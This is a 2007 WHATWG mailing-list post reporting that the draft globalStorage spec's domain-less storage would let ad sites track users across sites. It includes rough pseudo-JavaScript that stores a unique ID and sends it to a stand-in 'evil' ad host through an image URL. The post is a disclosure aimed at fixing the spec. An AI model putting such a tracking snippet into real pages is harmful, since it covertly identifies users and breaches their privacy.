[whatwg] Potenial Security Problem in Global Storage Specification
jbanes at gmail.com
Wed May 30 22:13:56 PDT 2007
This is my first post here, so apologies in advance if I'm not quite up on
the list etiquette.
I was just comparing the Storage API with that of the Google
and something jumped out at me. According to the spec, browsers should allow
a webapp to store data in the globalStorage object with no domain attached.
(i.e. globalStorage['']) This is intended to allow data to be shared across
My concern is that this poses a problem for the user's privacy. Let's say
that I'm an Evil Advertisement site. It is in my interest to penetrate the
user's veil of privacy and determine which pages they visit. I've
traditionally used cookies for this, but the browser makers foiled my
attempts by allowing cookies to only be accepted from the originating site.
But thanks to the new globalStorage API, I can store a Unique ID in the
one of my ads.
Here's some rough psuedo-js to demonstrate how it might work:
if(!gloabalStorage[''].evilbit) gloabalStorage[''].evilbit = createUUID();
//return a unique identifier using a random algorithm.
document.write('<img src="http://www.eviladagency.com' +
'?type=' + type +
'&tracking=' + gloabalStorage[''].evilbit+'">');
Is there something I'm missing that would prevent this?
-------------- next part --------------
An HTML attachment was scrubbed...
More information about the whatwg